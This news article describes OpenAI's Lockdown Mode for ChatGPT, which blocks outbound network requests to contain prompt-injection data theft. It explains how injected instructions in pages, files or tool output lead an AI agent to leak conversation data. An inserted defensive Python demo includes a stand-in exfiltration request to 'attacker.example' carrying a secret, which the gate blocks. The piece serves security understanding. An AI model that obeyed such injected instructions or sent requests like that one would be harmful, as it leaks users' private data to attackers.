OpenAI's Lockdown Mode Locks Down ChatGPT Against Prompt Injection Attacks
OpenAI is rolling out Lockdown Mode to all ChatGPT users, an optional security setting that disables live web browsing, deep research, and agent mode to block prompt injection attacks that try to exfiltrate sensitive data. The move signals that connected AI agents are creating attack surfaces that even frontier labs are racing to contain.
What Lockdown Mode Actually Does
OpenAI is expanding its Lockdown Mode security feature to all ChatGPT users, including Free, Go, Plus, and Pro accounts, as well as self‑serve Business accounts, according to Neowin. The feature was first introduced in February for enterprise plans but is now reaching a much wider audience.
When Lockdown Mode is enabled, it places hard limits on how ChatGPT interacts with external systems. Live web browsing is restricted to cached content only — no new network requests leave OpenAI's network. Deep Research is disabled entirely. Agent Mode, which can autonomously take actions, is turned off. Canvas‑generated code cannot access the network. ChatGPT also stops downloading files for data analysis, though manually uploaded files continue to work, TechCrunch reported.
"Lockdown Mode is not intended for everyone," OpenAI stated. "It is designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection."
The Attack Vector: Prompt Injection as Data Theft
Prompt injection is essentially social engineering for AI. An attacker hides malicious instructions inside a webpage, document, or tool output that the AI reads, tricking it into leaking sensitive conversation data to an external server. As AI agents gain the ability to browse the web, read emails, and execute code, the attack surface expands dramatically.
Lockdown Mode does not block prompt injections from entering ChatGPT's context. A malicious instruction could still appear in cached browsing content or an uploaded file, OpenAI acknowledged. Instead, the mode focuses on the exfiltration side — it blocks the outbound network requests that would allow an attacker to actually receive the stolen data.
This is part of a "defense‑in‑depth approach," OpenAI said. "As ChatGPT becomes more capable and connected, we're continuing to add practical protections that give users more choice over how ChatGPT works with sensitive information and connected features."
What Gets Disabled: The Full List
The feature disables or constrains several key ChatGPT capabilities:
- Live Web Browsing: Restricted to cached content only — search results may be stale or unavailable
- Deep Research: Disabled entirely — both standard deep research and shopping research
- Agent Mode: Disabled — ChatGPT cannot autonomously take multi‑step actions
- Canvas Networking: Code generated in Canvas cannot access the network
- Image Retrieval: ChatGPT cannot display images in responses or fetch them from the web
- File Downloads: ChatGPT cannot download files for analysis, though manual uploads still work
Who Gets It and How It Rolls Out
The rollout to personal accounts marks a significant expansion. Previously, Lockdown Mode was only available to enterprise customers through workspace admin controls. Now individual users can toggle it on from Settings > Security, according to Neowin.
Enterprise admins retain role‑based access controls — they can create custom roles and assign Lockdown Mode to specific users, such as executives or security team members who face elevated targeting risk. Alongside Lockdown Mode, OpenAI is also rolling out an Active Sessions feature that lets users see where their account is signed in across devices, adding another layer of visibility per OpenAI's help center.
What Lockdown Mode Doesn't Cover
The protection is deliberately narrow. "Lockdown Mode does not affect memory, file uploads, or the ability to share conversations," SecurityBrief Australia noted. It also does not restrict network access in Codex, OpenAI's coding agent, which operates under a different set of controls.
Connected apps — including MCP servers and third‑party connectors — present a separate exposure surface that Lockdown Mode doesn't directly address. Instead, OpenAI groups app actions by risk level: read actions in trusted apps are categorized as "Medium risk," while write actions are classified as higher risk because they create observable side effects. OpenAI does not recommend read or write actions to untrusted apps for Lockdown Mode users.
For builders working with sensitive data, this means Lockdown Mode is a useful layer — but it's not a complete security solution. Prompt injections can still alter model behavior. The mode is about containment, not prevention.
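The containment boundary described above (an injected instruction still enters the model's context; what gets blocked is the outbound request that would carry data out) together with the read/write risk tiers for connected apps, modelled as a small policy gate. This is an added example, not OpenAI's code: the tool names, risk labels, cache contents and the tool-call sequence are constructed stand-ins.

```python
"""Toy tool-call gate modelling the Lockdown Mode boundary. Added example, not
OpenAI code; tool names, risk labels and the cache are constructed stand-ins.
An injected instruction may still reach the model; what the gate does is deny
and log every live outbound request while cache hits and uploads keep working."""
from dataclasses import dataclass, field

CACHE = {"https://example.org/report": "cached page body"}  # constructed cache
DISABLED = {"deep_research", "agent_mode", "canvas_network", "image_fetch", "file_download"}

@dataclass
class Decision:
    allowed: bool
    risk: str  # "none", "medium", "elevated" or "blocked"
    reason: str

@dataclass
class LockdownGate:
    lockdown: bool = True
    trusted_apps: set = field(default_factory=set)
    audit: list = field(default_factory=list)  # denied egress, kept for review

    def deny(self, tool: str, target: str, reason: str) -> Decision:
        self.audit.append((tool, target))
        return Decision(False, "blocked", reason)

    def check(self, tool: str, target: str = "", write: bool = False) -> Decision:
        if not self.lockdown:
            return Decision(True, "none", "lockdown off")
        if tool in DISABLED:
            return self.deny(tool, target, f"{tool} is disabled in Lockdown Mode")
        if tool == "browse":  # cached content only, no new network request
            if target in CACHE:
                return Decision(True, "none", "served from cache")
            return self.deny(tool, target, "live network request blocked")
        if tool == "connected_app":  # not covered by Lockdown Mode; risk-tiered instead
            if target not in self.trusted_apps:
                return self.deny(tool, target, "untrusted app: not recommended")
            # reads on trusted apps are medium risk; writes have observable side effects
            return Decision(True, "elevated" if write else "medium", "trusted app")
        return Decision(True, "none", "memory, uploads and sharing are unaffected")

def demo() -> dict:
    """Constructed tool calls as a model might emit them after reading an injected
    page; the second browse call has the shape of a data-bearing exfiltration request."""
    gate = LockdownGate(trusted_apps={"calendar"})
    calls = [("browse", "https://example.org/report", False), ("file_upload", "notes.pdf", False),
             ("browse", "https://attacker.example/c?d=SECRET", False), ("deep_research", "", False),
             ("connected_app", "calendar", True), ("connected_app", "unknown_app", False)]
    result = {f"{t}:{x}": gate.check(t, x, w).allowed for t, x, w in calls}
    return result | {"denied": len(gate.audit)}
```

Running `demo()` shows the cached read and the upload succeed while the live request, the disabled feature and the untrusted app are denied and land in the audit list.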
The Bigger Picture: Securing the Connected Agent
The Lockdown Mode rollout arrives as AI agents are becoming more autonomous and more dangerous when compromised. OpenAI's own Codex can browse the web and execute code. Anthropic's Claude has an agent mode that operates across files and terminals. As these tools gain network access and the ability to take irreversible actions, prompt injection stops being an academic concern and becomes a real attack vector.
OpenAI is also standardizing "Elevated Risk" labels across ChatGPT, ChatGPT Atlas, and Codex, flagging features that carry additional security exposure. In Codex, for example, granting network access now comes with an explicit risk label and explanation of what changes, SecurityBrief reported.
The tension is clear: the most powerful AI features — web browsing, agent autonomy, tool use — are also the most dangerous when exploited. Lockdown Mode is OpenAI's acknowledgment that security can't just be added at the model level. It needs to live at the product level too.
Sources
1. Neowin (neowin.net)
2. TechCrunch (techcrunch.com)
3. SecurityBrief (securitybrief.com.au)
Jun 7, 2026